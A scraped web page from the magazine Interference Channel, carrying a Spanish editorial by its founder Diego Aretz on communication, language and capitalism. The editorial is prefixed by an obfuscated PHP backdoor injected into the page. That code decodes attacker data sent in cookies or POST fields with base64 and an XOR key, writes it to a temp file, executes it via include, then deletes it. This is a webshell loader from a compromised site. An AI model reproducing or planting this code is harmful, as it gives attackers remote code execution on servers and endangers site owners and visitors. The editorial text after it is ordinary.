$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Minutos a 200. – www.interferencechannel.com

Minutos a 200.

Esto es quizás un hipertexto, un medio que se pregunta sobre comunicación, un periodista que quiere abrir una pregunta inmanente en su trabajo, consciente de las dudas y reflexiones sobre la posibilidad de comunicar, y los procesos de comunicación de la cultura y  la vida contemporáneas.

Puedo recorrer centros comerciales, organizaciones públicas, privadas, calles, laberintos mediáticos. En Paris, en Nueva York, en Berlín, en nuestra tableu vibant; la deliciosa carrera 13. En cada esquina una semiótica diferente, cada parlante un discurso atrayente, tu atención, tus palabras, scroll the newsfeed y alimenta tus ojos con la comunicación de decenas de personas alrededor del mundo, personas bombardeadas también por publicidades contradictoras, por publicistas confundidos, por bocas gritonas de palabras insulsas y vanas.

Porque la pregunta es comunicar pero comunicar qué!!! Nuestro sistema, el bello capitalismo, regula también nuestro lenguaje, nuestras palabras, nuestras negociaciones semánticas, la manera en que entendemos al otro, la manera en que percibimos el mundo. Pues ya lo sabemos el lenguaje y la realidad son dos caras de una misma moneda, una moneda Borgiana quizás.

Cómo pararse frente a esa cantidad de información que nos llega, cómo entenderla, cómo traducirla, cómo domesticarla. El desarrollo tecnológico de los últimos 40 años ha superado todas las imaginaciones de nuestros antiguos pensadores, Julio Verne soñó todo pero no soñó Facebook.

Frente a esta situación en que nos encontramos, la invitación es indudablemente la subversión; subversión lingüística, subversión semántica, subversión informática. Todos los que participan cargan una ideología: google y Facebook, y mac y Microsoft y los medianos y los pequeños. Nuestro deber es leer con atención, reflexionar con audacia, entender y subvertir estos discursos. El arte contemporáneo es quizás la disciplina más didáctica para hacer esto, la posibilidad de la crítica desde la imagen, desde la forma, desde lo visual, es sin lugar a dudas una posibilidad poderosa. La arquitectura, el diseño y la palabra son los campos en donde estas subversiones adquieren peso, realidad, y donde más mentes pueden ser tocadas por estas ideas.

En esta edición invitamos a Julie Cangrand a seleccionar y recomendar una artista para la portada, su elección fue la artista marroquí Meriem Bennani “Meriem está más bien interesada en mostrar cómo evolucionan nuestros códigos estéticos y culturales… cómo el velo pasa de ser un objeto o símbolo uniformizante hasta convertirse en una accesorio a través del cual la mujer musulmana puede expresar y transmitir su individualidad.” Nicolás Ureta se estrena con nosotros con “Cómo fabricar una naranja mecánica” y tendremos la participación de nuestros colaboradores permanentes.

Los invito a leernos y reflexionar, en esta edición: la comunicación.

Minutos a 200, yo no vendo minutos a 200…eso fue  quizás publicidad engañosa.

 

Diego Aretz es fundador y editor de Interference Channel.

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